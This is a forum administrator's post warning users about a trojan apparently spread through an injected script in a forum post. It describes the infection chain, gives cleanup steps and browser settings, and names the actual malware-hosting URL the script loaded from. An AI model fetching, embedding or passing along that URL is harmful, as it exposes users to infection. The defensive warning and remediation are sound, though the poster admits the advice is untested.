X Library Forums
You are not logged in.
New user registration is currently disabled.
I'm not sure what's going on. I think I got that trojan again (Trojan.Vundo.H), but this time I reacted immediately and I had already changed all my passwords.
One guess is that someone is hacking this forum and it causes you to get the trojan when viewing their post. I get a dialog box about opening a pdf file, I cancel it, then there's an svchost process running, taking 50% cpu time.
If this suspicion is true then it means some of you may have got it too. I am so very, very sorry. If this happens, you need to immediately pull your network cable, or turn your router off. Reboot in safe mode. Run something like MalwareBytes AntiMalware, then run HijackThis and do a complete, manual clean-up. Note that HijackThis is a very powerful and potentially dangerous tool. If you do not know how to use it then don't! Get someone to help you. There are forums where you can post a HijackThis log and they will help you. Needless to say, you need to be doing that on a computer other than the infected one. After this, to be safe, change ALL your passwords. If you have websites where you access your host via ftp or ssh then check all "index.*" and "*.js" files. Some Js may have been added to the end of those files which, I assume, spreads whatever this is.
These people are not hackers. "We" are hackers. These people are no different than paid thugs who break into your home. Their main goal is forced hosting and viral spread of advertising. Yes, advertising. They give honest advertising companies a very bad name. These scum are not doing this for fun - they are getting paid to do it - and I imagine the actual advertisers have no idea how their links are getting spread - they just purchase some "package" from a shady company who, it seems in this case, work with some companies in Russia who actually develop this stuff. I curse you, you sorry SOBs.
I deleted the suspect post as soon as I saw it. But, again, I sincerely apologize if any of you caught this. I think the only thing I can do is to take this forum down. I've been having to spend way too much time on maintenance, and now this. sigh
I now have the total number of registered users down to 196, whereas just a few days ago it was over 1500. I deleted any posts and users that were suspect in any way. I want to make this a forum you feel safe at - I promise you I am trying hard to do that. So far, nobody has reported that they caught anything from this forum... except me. So I'm beginning to wonder if I actually caught it from this forum or not. At any rate, I have disabled new user registration for now.
The code creates a script element and has it run some code from this URL: http://zylom-com.studiverzeichnis.com.topix-com.simpleworldhouse.ru:8080/wired.com/wired.com/google.com/tudou.com/asg.to/. It appears to deliver a PDF which itself runs a script (I'm just guessing about the PDF script) which modifies a registry entry to cause "siszyd32.exe" to be run on startup. You'll get a dialog box with something about updating a PDF (I can't remember the exact wording), and even if you cancel it, the deed is done. The properties for "siszyd32.exe" have this:
Nero StartSmart 8 Inline Function DiscCopy Server Original filename: InFDiscCopyServer.exe Version: 188.8.131.52 Company: Nero AG
I have no idea what it copied from my harddrive and I'm thinking seriously about reformatting and reinstalling everything. This trojan is known as one of the following, I'm not really sure which: "Trojan.Vundo.H", "Troj/Agent-LVN" or "Rogue.SystemSecurity".
I'm posting this information in the hopes that it will help someone - as well as myself. I didn't think I could get something like this using Firefox, but I'm guessing the blame is more on Acrobat Reader than on Firefox. I'd like to know what configuration changes I need to make in Firefox and/or Acrobat Reader so that this can not happen again.
Here are some application settings I changed, in the hope of preventing this from happening again:
In Firefox, go to "Tools / Options / Applications" and for all Adobe Acrobat types set their action to "Always ask".
I have no idea if making these changes will prevent the trojan from being installed. The only way to be sure is to set up a page which contains the malicious code and give it a try... but I'm too chicken to try it